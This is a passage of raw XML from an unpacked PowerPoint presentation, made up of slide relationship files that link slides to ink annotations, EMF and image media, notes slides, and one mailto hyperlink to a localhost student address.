Target="../ink/ink1267.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide248.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74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50.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1265.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1262.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1266.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7370.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7340.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1264.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7390.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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9.xml"/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68.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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7.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1269.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image746.emf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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image751.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide25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71.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image749.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1270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2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3.xml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4.xml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3.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1272.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1274.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image754.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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2.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1276.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1273.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7440.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7410.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1275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2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0.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink151.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image128.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink146.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink148.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4811.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink153.xml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12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0.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink150.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink147.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink152.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4711.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7310.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink149.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1262.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide26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79.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image758.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide25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78.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image762.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image757.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1280.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1277.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image759.emf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8.xml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286.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image755.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7590.emf"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1299.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1290.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image765.emf"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image769.emf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1283.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide259.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7540.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image756.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1294.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink130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8.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1285.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7580.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image764.emf"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1298.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image768.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1282.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1287.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1291.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7620.emf"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image766.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7510.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1289.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1295.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7470.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1284.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image753.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7570.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1293.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image763.emf"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1297.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7490.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1281.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image752.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1288.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1292.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1296.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image767.emf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1.xml"/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2.xml"/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01.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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1.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1302.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image770.emf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4.xml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5.xml"/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05.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:student@127.0.0.1" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image773.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide26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04.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image775.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image772.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1306.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1303.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image774.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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8.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1312.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1307.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1309.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image780.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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7.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1311.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1308.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image779.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image776.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1310.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image781.emf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9.xml"/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270.xml"/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1.xml"/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5.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1313.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1315.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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4.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1314.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image783.emf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27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png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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9.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1316.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1318.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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8.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1317.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image787.emf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275.xml"/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4.emf"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink161.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink165.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image147.emf"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image138.emf"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink169.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink173.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image129.emf"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink177.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image131.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide28.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink160.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image142.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image133.emf"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink164.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink168.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image146.emf"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink172.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1121.emf"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image152.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image130.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink157.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image137.emf"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image143.emf"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink174.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink178.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink154.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image132.emf"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink159.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink163.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image141.emf"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink167.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image145.emf"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image149.emf"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink176.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink156.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image151.emf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.jpeg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink158.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.emf"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140.emf"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image144.emf"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink171.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink175.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink162.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148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5.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135.emf"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image139.emf"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink166.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink170.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image150.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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70.emf"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1324.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1319.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1321.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7790.emf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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60.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1323.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1320.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7780.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7750.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1322.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7800.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2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278.xml"/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9.xml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0.xml"/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25.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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3.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1326.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image792.emf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27.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2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5.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink1328.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image794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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.jpeg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1520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0.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1112.emf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1510.emf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink182.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink179.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15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88.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1100.emf"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image157.emf"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink201.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink192.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image161.emf"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1502.emf"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink205.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image840.emf"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink209.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink185.xml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1090.emf"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink196.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink187.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image156.emf"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image160.emf"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink200.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1292.emf"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink204.xml"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink208.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink184.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1060.emf"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink191.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink197.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image164.emf"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image167.emf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1030.emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink186.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1080.emf"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image155.emf"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink195.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image159.emf"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink199.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink203.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image166.emf"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image169.emf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1050.emf"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink207.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink183.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1070.emf"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink190.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink194.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink198.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image163.emf"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image165.emf"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image154.emf"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink202.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16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0.emf"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink189.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" 